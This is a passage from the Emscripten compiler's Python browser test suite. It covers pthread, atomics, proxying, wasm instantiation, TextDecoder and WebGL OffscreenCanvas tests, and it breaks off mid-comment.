def test_pthread_gcc_atomic_op_and_fetch(self):
self.btest(test_file('pthread', 'test_pthread_gcc_atomic_op_and_fetch.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# 64 bit version of the above test.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_64bit_atomic_op_and_fetch(self):
self.btest(test_file('pthread', 'test_pthread_gcc_64bit_atomic_op_and_fetch.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# Tests the rest of the remaining GCC atomics after the two above tests.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_atomics(self):
self.btest(test_file('pthread', 'test_pthread_gcc_atomics.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the __sync_lock_test_and_set and __sync_lock_release primitives.
@requires_threads
def test_pthread_gcc_spinlock(self):
for arg in [[], ['-DUSE_EMSCRIPTEN_INTRINSICS']]:
self.btest(test_file('pthread', 'test_pthread_gcc_spinlock.cpp'), expected='800', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'] + arg, also_asmjs=True)
# Test that basic thread creation works.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_create(self):
def test(args):
print(args)
self.btest(test_file('pthread', 'test_pthread_create.cpp'),
expected='0',
args=['-s', 'INITIAL_MEMORY=64MB', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'] + args,
extra_tries=0) # this should be 100% deterministic
print() # new line
test([])
test(['-O3'])
# TODO: re-enable minimal runtime once the flakiness is figure out,
# https://github.com/emscripten-core/emscripten/issues/12368
# test(['-s', 'MINIMAL_RUNTIME'])
# Test that preallocating worker threads work.
@requires_threads
def test_pthread_preallocates_workers(self):
self.btest(test_file('pthread', 'test_pthread_preallocates_workers.cpp'), expected='0', args=['-O3', '-s', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=4', '-s', 'PTHREAD_POOL_DELAY_LOAD'])
# Test that allocating a lot of threads doesn't regress. This needs to be checked manually!
@requires_threads
def test_pthread_large_pthread_allocation(self):
self.btest(test_file('pthread', 'test_large_pthread_allocation.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=128MB', '-O3', '-s', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=50'], message='Check output from test to ensure that a regression in time it takes to allocate the threads has not occurred.')
# Tests the -s PROXY_TO_PTHREAD=1 option.
@requires_threads
def test_pthread_proxy_to_pthread(self):
self.btest(test_file('pthread', 'test_pthread_proxy_to_pthread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Test that a pthread can spawn another pthread of its own.
@requires_threads
def test_pthread_create_pthread(self):
for modularize in [[], ['-s', 'MODULARIZE', '-s', 'EXPORT_NAME=MyModule', '--shell-file', test_file('shell_that_launches_modularize.html')]]:
self.btest(test_file('pthread', 'test_pthread_create_pthread.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2'] + modularize)
# Test another case of pthreads spawning pthreads, but this time the callers immediately join on the threads they created.
@requires_threads
def test_pthread_nested_spawns(self):
self.btest(test_file('pthread', 'test_pthread_nested_spawns.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2'])
# Test that main thread can wait for a pthread to finish via pthread_join().
@requires_threads
def test_pthread_join(self):
self.btest(test_file('pthread', 'test_pthread_join.cpp'), expected='6765', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that threads can rejoin the pool once detached and finished
@requires_threads
def test_std_thread_detach(self):
self.btest(test_file('pthread', 'test_std_thread_detach.cpp'), expected='0', args=['-s', 'USE_PTHREADS'])
# Test pthread_cancel() operation
@requires_threads
def test_pthread_cancel(self):
self.btest(test_file('pthread', 'test_pthread_cancel.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthread_cancel() cancels pthread_cond_wait() operation
@requires_threads
def test_pthread_cancel_cond_wait(self):
self.btest_exit(test_file('pthread', 'test_pthread_cancel_cond_wait.cpp'), assert_returncode=1, args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test pthread_kill() operation
@no_chrome('pthread_kill hangs chrome renderer, and keep subsequent tests from passing')
@requires_threads
def test_pthread_kill(self):
self.btest(test_file('pthread', 'test_pthread_kill.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthread cleanup stack (pthread_cleanup_push/_pop) works.
@requires_threads
def test_pthread_cleanup(self):
self.btest(test_file('pthread', 'test_pthread_cleanup.cpp'), expected='907640832', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Tests the pthread mutex api.
@requires_threads
def test_pthread_mutex(self):
for arg in [[], ['-DSPINLOCK_TEST']]:
self.btest(test_file('pthread', 'test_pthread_mutex.cpp'), expected='50', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'] + arg)
@requires_threads
def test_pthread_attr_getstack(self):
self.btest(test_file('pthread', 'test_pthread_attr_getstack.cpp'), expected='0', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2'])
# Test that memory allocation is thread-safe.
@requires_threads
def test_pthread_malloc(self):
self.btest(test_file('pthread', 'test_pthread_malloc.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Stress test pthreads allocating memory that will call to sbrk(), and main thread has to free up the data.
@requires_threads
def test_pthread_malloc_free(self):
self.btest(test_file('pthread', 'test_pthread_malloc_free.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'INITIAL_MEMORY=256MB'])
# Test that the pthread_barrier API works ok.
@requires_threads
def test_pthread_barrier(self):
self.btest(test_file('pthread', 'test_pthread_barrier.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the pthread_once() function.
@requires_threads
def test_pthread_once(self):
self.btest(test_file('pthread', 'test_pthread_once.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test against a certain thread exit time handling bug by spawning tons of threads.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_spawns(self):
self.btest(test_file('pthread', 'test_pthread_spawns.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '--closure=1', '-s', 'ENVIRONMENT=web,worker'])
# It is common for code to flip volatile global vars for thread control. This is a bit lax, but nevertheless, test whether that
# kind of scheme will work with Emscripten as well.
@requires_threads
def test_pthread_volatile(self):
for arg in [[], ['-DUSE_C_VOLATILE']]:
self.btest(test_file('pthread', 'test_pthread_volatile.cpp'), expected='1', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'] + arg)
# Test thread-specific data (TLS).
@requires_threads
def test_pthread_thread_local_storage(self):
self.btest(test_file('pthread', 'test_pthread_thread_local_storage.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'ASSERTIONS'])
# Test the pthread condition variable creation and waiting.
@requires_threads
def test_pthread_condition_variable(self):
self.btest(test_file('pthread', 'test_pthread_condition_variable.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthreads are able to do printf.
@requires_threads
def test_pthread_printf(self):
def run(debug):
self.btest(test_file('pthread', 'test_pthread_printf.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-s', 'LIBRARY_DEBUG=%d' % debug])
run(debug=True)
run(debug=False)
# Test that pthreads are able to do cout. Failed due to https://bugzilla.mozilla.org/show_bug.cgi?id=1154858.
@requires_threads
def test_pthread_iostream(self):
self.btest(test_file('pthread', 'test_pthread_iostream.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
@requires_threads
def test_pthread_unistd_io_bigint(self):
self.btest_exit(test_file('unistd', 'io.c'), args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'WASM_BIGINT'])
# Test that the main thread is able to use pthread_set/getspecific.
@requires_threads
def test_pthread_setspecific_mainthread(self):
self.btest(test_file('pthread', 'test_pthread_setspecific_mainthread.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS'], also_asmjs=True)
# Test that pthreads have access to filesystem.
@requires_threads
def test_pthread_file_io(self):
self.btest(test_file('pthread', 'test_pthread_file_io.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test that the pthread_create() function operates benignly in the case that threading is not supported.
@requires_threads
def test_pthread_supported(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8']]:
self.btest(test_file('pthread', 'test_pthread_supported.cpp'), expected='0', args=['-O3'] + args)
@requires_threads
def test_pthread_dispatch_after_exit(self):
self.btest_exit(test_file('pthread', 'test_pthread_dispatch_after_exit.c'), args=['-s', 'USE_PTHREADS'])
# Test the operation of Module.pthreadMainPrefixURL variable
@no_wasm_backend('uses js')
@requires_threads
def test_pthread_custom_pthread_main_url(self):
ensure_dir('cdn')
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten/emscripten.h>
#include <emscripten/threading.h>
#include <pthread.h>
int result = 0;
void *thread_main(void *arg) {
emscripten_atomic_store_u32(&result, 1);
pthread_exit(0);
}
int main() {
pthread_t t;
if (emscripten_has_threading_support()) {
pthread_create(&t, 0, thread_main, 0);
pthread_join(t, 0);
} else {
result = 1;
}
REPORT_RESULT(result);
}
''')
# Test that it is possible to define "Module.locateFile" string to locate where worker.js will be loaded from.
create_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-o', 'test.html'])
shutil.move('test.worker.js', os.path.join('cdn', 'test.worker.js'))
shutil.copyfile('test.html.mem', os.path.join('cdn', 'test.html.mem'))
self.run_browser('test.html', '', '/report_result?1')
# Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
create_file('shell2.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.worker.js") return "cdn/test.worker.js"; else return filename; }, '))
self.compile_btest(['main.cpp', '--shell-file', 'shell2.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-o', 'test2.html'])
try_delete('test.worker.js')
self.run_browser('test2.html', '', '/report_result?1')
# Test that if the main thread is performing a futex wait while a pthread needs it to do a proxied operation (before that pthread would wake up the main thread), that it's not a deadlock.
@requires_threads
def test_pthread_proxying_in_futex_wait(self):
self.btest(test_file('pthread', 'test_pthread_proxying_in_futex_wait.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test that sbrk() operates properly in multithreaded conditions
@requires_threads
def test_pthread_sbrk(self):
for aborting_malloc in [0, 1]:
print('aborting malloc=' + str(aborting_malloc))
# With aborting malloc = 1, test allocating memory in threads
# With aborting malloc = 0, allocate so much memory in threads that some of the allocations fail.
self.btest(test_file('pthread', 'test_pthread_sbrk.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'ABORTING_MALLOC=' + str(aborting_malloc), '-DABORTING_MALLOC=' + str(aborting_malloc), '-s', 'INITIAL_MEMORY=128MB'])
# Test that -s ABORTING_MALLOC=0 works in both pthreads and non-pthreads builds. (sbrk fails gracefully)
@requires_threads
def test_pthread_gauge_available_memory(self):
for opts in [[], ['-O2']]:
for args in [[], ['-s', 'USE_PTHREADS']]:
self.btest(test_file('gauge_available_memory.cpp'), expected='1', args=['-s', 'ABORTING_MALLOC=0'] + args + opts)
# Test that the proxying operations of user code from pthreads to main thread work
@requires_threads
def test_pthread_run_on_main_thread(self):
self.btest(test_file('pthread', 'test_pthread_run_on_main_thread.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test how a lot of back-to-back called proxying operations behave.
@requires_threads
def test_pthread_run_on_main_thread_flood(self):
self.btest(test_file('pthread', 'test_pthread_run_on_main_thread_flood.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
@requires_threads
def test_pthread_call_async(self):
self.btest(test_file('pthread', 'call_async.c'), expected='1', args=['-s', 'USE_PTHREADS'])
# Test that it is possible to synchronously call a JavaScript function on the main thread and get a return value back.
@requires_threads
def test_pthread_call_sync_on_main_thread(self):
self.btest(test_file('pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-DPROXY_TO_PTHREAD=1', '--js-library', test_file('pthread', 'call_sync_on_main_thread.js')])
self.btest(test_file('pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread', 'call_sync_on_main_thread.js')])
self.btest(test_file('pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread', 'call_sync_on_main_thread.js'), '-s', 'EXPORTED_FUNCTIONS=[_main,_malloc]'])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
@requires_threads
def test_pthread_call_async_on_main_thread(self):
self.btest(test_file('pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-DPROXY_TO_PTHREAD=1', '--js-library', test_file('pthread', 'call_async_on_main_thread.js')])
self.btest(test_file('pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread', 'call_async_on_main_thread.js')])
self.btest(test_file('pthread', 'call_async_on_main_thread.c'), expected='7', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread', 'call_async_on_main_thread.js')])
# Tests that spawning a new thread does not cause a reinitialization of the global data section of the application memory area.
@requires_threads
def test_pthread_global_data_initialization(self):
mem_init_modes = [[], ['--memory-init-file', '0'], ['--memory-init-file', '1']]
for mem_init_mode in mem_init_modes:
for args in [['-s', 'MODULARIZE', '-s', 'EXPORT_NAME=MyModule', '--shell-file', test_file('shell_that_launches_modularize.html')], ['-O3']]:
self.btest(test_file('pthread', 'test_pthread_global_data_initialization.c'), expected='20', args=args + mem_init_mode + ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'PTHREAD_POOL_SIZE'])
@requires_threads
@requires_sync_compilation
def test_pthread_global_data_initialization_in_sync_compilation_mode(self):
mem_init_modes = [[], ['--memory-init-file', '0'], ['--memory-init-file', '1']]
for mem_init_mode in mem_init_modes:
args = ['-s', 'WASM_ASYNC_COMPILATION=0']
self.btest(test_file('pthread', 'test_pthread_global_data_initialization.c'), expected='20', args=args + mem_init_mode + ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'PTHREAD_POOL_SIZE'])
# Test that emscripten_get_now() reports coherent wallclock times across all pthreads, instead of each pthread independently reporting wallclock times since the launch of that pthread.
@requires_threads
def test_pthread_clock_drift(self):
self.btest(test_file('pthread', 'test_pthread_clock_drift.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
def test_pthread_utf8_funcs(self):
self.btest(test_file('pthread', 'test_pthread_utf8_funcs.cpp'), expected='0', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test the emscripten_futex_wake(addr, INT_MAX); functionality to wake all waiters
@requires_threads
def test_pthread_wake_all(self):
self.btest(test_file('pthread', 'test_futex_wake_all.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'INITIAL_MEMORY=64MB', '-s', 'NO_EXIT_RUNTIME'], also_asmjs=True)
# Test that stack base and max correctly bound the stack on pthreads.
@requires_threads
def test_pthread_stack_bounds(self):
self.btest(test_file('pthread', 'test_pthread_stack_bounds.cpp'), expected='1', args=['-s', 'USE_PTHREADS'])
# Test that real `thread_local` works.
@requires_threads
def test_pthread_tls(self):
self.btest(test_file('pthread', 'test_pthread_tls.cpp'), expected='1337', args=['-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS'])
# Test that real `thread_local` works in main thread without PROXY_TO_PTHREAD.
@requires_threads
def test_pthread_tls_main(self):
self.btest(test_file('pthread', 'test_pthread_tls_main.cpp'), expected='1337', args=['-s', 'USE_PTHREADS'])
@requires_threads
def test_pthread_safe_stack(self):
# Note that as the test runs with PROXY_TO_PTHREAD, we set TOTAL_STACK,
# and not DEFAULT_PTHREAD_STACK_SIZE, as the pthread for main() gets the
# same stack size as the main thread normally would.
self.btest(test_file('core', 'test_safe_stack.c'), expected='abort:stack overflow', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'STACK_OVERFLOW_CHECK=2', '-s', 'TOTAL_STACK=64KB'])
@parameterized({
'leak': ['test_pthread_lsan_leak', ['-g4']],
'no_leak': ['test_pthread_lsan_no_leak'],
})
@requires_threads
def test_pthread_lsan(self, name, args=[]):
self.btest(test_file('pthread', name + '.cpp'), expected='1', args=['-fsanitize=leak', '-s', 'INITIAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '--pre-js', test_file('pthread', name + '.js')] + args)
@parameterized({
# Reusing the LSan test files for ASan.
'leak': ['test_pthread_lsan_leak', ['-g4']],
'no_leak': ['test_pthread_lsan_no_leak'],
})
@requires_threads
def test_pthread_asan(self, name, args=[]):
self.btest(test_file('pthread', name + '.cpp'), expected='1', args=['-fsanitize=address', '-s', 'INITIAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '--pre-js', test_file('pthread', name + '.js')] + args)
@requires_threads
def test_pthread_asan_use_after_free(self):
self.btest(test_file('pthread', 'test_pthread_asan_use_after_free.cpp'), expected='1', args=['-fsanitize=address', '-s', 'INITIAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '--pre-js', test_file('pthread', 'test_pthread_asan_use_after_free.js')])
@requires_threads
def test_pthread_exit_process(self):
args = ['-s', 'USE_PTHREADS',
'-s', 'PROXY_TO_PTHREAD',
'-s', 'PTHREAD_POOL_SIZE=2',
'-s', 'EXIT_RUNTIME',
'-DEXIT_RUNTIME',
'-O0']
args += ['--pre-js', test_file('core', 'pthread', 'test_pthread_exit_runtime.pre.js')]
self.btest(test_file('core', 'pthread', 'test_pthread_exit_runtime.c'), expected='onExit status: 42', args=args)
@requires_threads
def test_pthread_no_exit_process(self):
# Same as above but without EXIT_RUNTIME. In this case we don't expect onExit to
# ever be called.
args = ['-s', 'USE_PTHREADS',
'-s', 'PROXY_TO_PTHREAD',
'-s', 'PTHREAD_POOL_SIZE=2',
'-O0']
args += ['--pre-js', test_file('core', 'pthread', 'test_pthread_exit_runtime.pre.js')]
self.btest(test_file('core', 'pthread', 'test_pthread_exit_runtime.c'), expected='43', args=args)
# Tests MAIN_THREAD_EM_ASM_INT() function call signatures.
def test_main_thread_em_asm_signatures(self):
self.btest_exit(test_file('core', 'test_em_asm_signatures.cpp'), assert_returncode=121, args=[])
@requires_threads
def test_main_thread_em_asm_signatures_pthreads(self):
self.btest_exit(test_file('core', 'test_em_asm_signatures.cpp'), assert_returncode=121, args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'ASSERTIONS'])
@requires_threads
def test_main_thread_async_em_asm(self):
self.btest_exit(test_file('core', 'test_main_thread_async_em_asm.cpp'), args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'ASSERTIONS'])
@requires_threads
def test_main_thread_em_asm_blocking(self):
create_file('page.html', open(test_file('browser', 'test_em_asm_blocking.html')).read())
self.compile_btest([test_file('browser', 'test_em_asm_blocking.cpp'), '-O2', '-o', 'wasm.js', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
self.run_browser('page.html', '', '/report_result?8')
# Test that it is possible to send a signal via calling alarm(timeout), which in turn calls to the signal handler set by signal(SIGALRM, func);
def test_sigalrm(self):
self.btest(test_file('sigalrm.cpp'), expected='0', args=['-O3'])
def test_canvas_style_proxy(self):
self.btest('canvas_style_proxy.c', expected='1', args=['--proxy-to-worker', '--shell-file', test_file('canvas_style_proxy_shell.html'), '--pre-js', test_file('canvas_style_proxy_pre.js')])
def test_canvas_size_proxy(self):
self.btest(test_file('canvas_size_proxy.c'), expected='0', args=['--proxy-to-worker'])
def test_custom_messages_proxy(self):
self.btest(test_file('custom_messages_proxy.c'), expected='1', args=['--proxy-to-worker', '--shell-file', test_file('custom_messages_proxy_shell.html'), '--post-js', test_file('custom_messages_proxy_postjs.js')])
def test_vanilla_html_when_proxying(self):
for opts in [0, 1, 2]:
print(opts)
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js', '-O' + str(opts), '--proxy-to-worker'])
create_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
def test_in_flight_memfile_request(self):
# test the XHR for an asm.js mem init file being in flight already
for o in [0, 1, 2]:
print(o)
opts = ['-O' + str(o), '-s', 'WASM=0']
print('plain html')
self.compile_btest([test_file('in_flight_memfile_request.c'), '-o', 'test.js'] + opts)
create_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0') # never when we provide our own HTML like this.
print('default html')
self.btest('in_flight_memfile_request.c', expected='0' if o < 2 else '1', args=opts) # should happen when there is a mem init file (-O2+)
@requires_sync_compilation
def test_binaryen_async(self):
# notice when we use async compilation
script = '''
<script>
// note if we do async compilation
var real_wasm_instantiate = WebAssembly.instantiate;
var real_wasm_instantiateStreaming = WebAssembly.instantiateStreaming;
if (typeof real_wasm_instantiateStreaming === 'function') {
WebAssembly.instantiateStreaming = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiateStreaming(a, b);
};
} else {
WebAssembly.instantiate = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiate(a, b);
};
}
// show stderr for the viewer's fun
err = function(x) {
out('<<< ' + x + ' >>>');
console.log(x);
};
</script>
{{{ SCRIPT }}}
'''
shell_with_script('shell.html', 'shell.html', script)
common_args = ['--shell-file', 'shell.html']
for opts, returncode in [
([], 1),
(['-O1'], 1),
(['-O2'], 1),
(['-O3'], 1),
(['-s', 'WASM_ASYNC_COMPILATION'], 1), # force it on
(['-O1', '-s', 'WASM_ASYNC_COMPILATION=0'], 0), # force it off
]:
print(opts, returncode)
self.btest_exit('binaryen_async.c', assert_returncode=returncode, args=common_args + opts)
# Ensure that compilation still works and is async without instantiateStreaming available
no_streaming = ' <script> WebAssembly.instantiateStreaming = undefined;</script>'
shell_with_script('shell.html', 'shell.html', no_streaming + script)
self.btest_exit('binaryen_async.c', assert_returncode=1, args=common_args)
# Test that implementing Module.instantiateWasm() callback works.
@parameterized({
'': ([],),
'asan': (['-fsanitize=address', '-s', 'INITIAL_MEMORY=128MB'],)
})
def test_manual_wasm_instantiate(self, args=[]):
self.compile_btest([test_file('manual_wasm_instantiate.cpp'), '-o', 'manual_wasm_instantiate.js'] + args)
shutil.copyfile(test_file('manual_wasm_instantiate.html'), 'manual_wasm_instantiate.html')
self.run_browser('manual_wasm_instantiate.html', 'wasm instantiation succeeded', '/report_result?1')
def test_wasm_locate_file(self):
# Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
ensure_dir('cdn')
create_file('shell2.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.wasm") return "cdn/test.wasm"; else return filename; }, '))
self.compile_btest([test_file('browser_test_hello_world.c'), '--shell-file', 'shell2.html', '-o', 'test.html'])
shutil.move('test.wasm', os.path.join('cdn', 'test.wasm'))
self.run_browser('test.html', '', '/report_result?0')
def test_utf8_textdecoder(self):
self.btest_exit('benchmark_utf8.cpp', 0, args=['--embed-file', test_file('utf8_corpus.txt') + '@/utf8_corpus.txt', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=[UTF8ToString]'])
def test_utf16_textdecoder(self):
self.btest_exit('benchmark_utf16.cpp', 0, args=['--embed-file', test_file('utf16_corpus.txt') + '@/utf16_corpus.txt', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=[UTF16ToString,stringToUTF16,lengthBytesUTF16]'])
def test_TextDecoder(self):
self.btest('browser_test_hello_world.c', '0', args=['-s', 'TEXTDECODER=0'])
just_fallback = os.path.getsize('test.js')
self.btest('browser_test_hello_world.c', '0')
td_with_fallback = os.path.getsize('test.js')
self.btest('browser_test_hello_world.c', '0', args=['-s', 'TEXTDECODER=2'])
td_without_fallback = os.path.getsize('test.js')
self.assertLess(td_without_fallback, just_fallback)
self.assertLess(just_fallback, td_with_fallback)
def test_small_js_flags(self):
self.btest('browser_test_hello_world.c', '0', args=['-O3', '--closure=1', '-s', 'INCOMING_MODULE_JS_API=[]', '-s', 'ENVIRONMENT=web'])
# Check an absolute js code size, with some slack.
size = os.path.getsize('test.js')
print('size:', size)
# Note that this size includes test harness additions (for reporting the result, etc.).
self.assertLess(abs(size - 5453), 100)
# Tests that it is possible to initialize and render WebGL content in a pthread by using OffscreenCanvas.
# -DTEST_CHAINED_WEBGL_CONTEXT_PASSING: Tests that it is possible to transfer WebGL canvas in a chain from main thread -> thread 1 -> thread 2 and then init and render WebGL content there.
@no_chrome('see https://crbug.com/961765')
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_in_pthread(self):
for args in [[], ['-DTEST_CHAINED_WEBGL_CONTEXT_PASSING']]:
self.btest('gl_in_pthread.cpp', expected='1', args=args + ['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT', '-lGL'])
# Tests that it is possible to render WebGL content on a <canvas> on the main thread, after it has once been used to render WebGL content in a pthread first
# -DTEST_MAIN_THREAD_EXPLICIT_COMMIT: Test the same (WebGL on main thread after pthread), but by using explicit .commit() to swap on the main thread instead of implicit "swap when rAF ends" logic
@requires_threads
@requires_offscreen_canvas
@disabled('This test is disabled because current OffscreenCanvas does not allow transfering it after a rendering context has been created for it.')
def test_webgl_offscreen_canvas_in_mainthread_after_pthread(self):
for args in [[], ['-DTEST_MAIN_THREAD_EXPLICIT_COMMIT']]:
self.btest('gl_in_mainthread_after_pthread.cpp', expected='0', args=args + ['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT', '-lGL'])
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_only_in_pthread(self):
self.btest('gl_only_in_pthread.cpp', expected='0', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-s', 'OFFSCREENCANVAS_SUPPORT', '-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER'])
# Tests that rendering from client side memory without default-enabling extensions works.
@requires_graphics_hardware
def test_webgl_from_client_side_memory_without_default_enabled_extensions(self):
self.btest('webgl_draw_triangle.c', '0', args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1', '-DDRAW_FROM_CLIENT_MEMORY=1', '-s', 'FULL_ES2=1'])
# Tests for WEBGL_multi_draw extension
# For testing WebGL draft extensions like this, if using chrome as the browser,
